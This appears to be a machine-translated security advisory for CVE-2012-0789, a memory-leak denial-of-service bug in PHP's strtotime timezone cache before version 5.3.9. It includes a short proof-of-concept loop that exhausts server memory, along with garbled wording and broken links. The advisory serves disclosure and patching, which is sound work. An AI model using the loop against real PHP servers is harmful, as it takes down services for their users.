Remote access rejection vulnerability in strtotime function calls in PHP versions earlier than 5.3.9

Release date: 2012-03-24
Updated on: 2012-03-27

Affected Systems:
PHP 5.x
Unaffected system:
PHP 5.3.9
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52043
Cve id: CVE-2012-0789

PHP is a script language running on a computer. It is mainly used to process dynamic web pages, including command line interfaces or graphical user interface programs.

In versions earlier than PHP 5.3.9, memory leakage exists in the implementation of the time zone function. The php_date_parse_tzfile cache does not properly handle multiple strtotime function calls, resulting in DOS of memory depletion,

<* Source: vendor

Link: https://bugs.php.net/bug.php? Id = 53502
Https://bugzilla.redhat.com/show_bug.cgi? Id = 783609
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

& Lt ;? Php
While (true)
{
Strtotime ('Monday 00:00 Europe/Paris '); // Memory leak
}
? & Gt;

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

PHP
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.php.net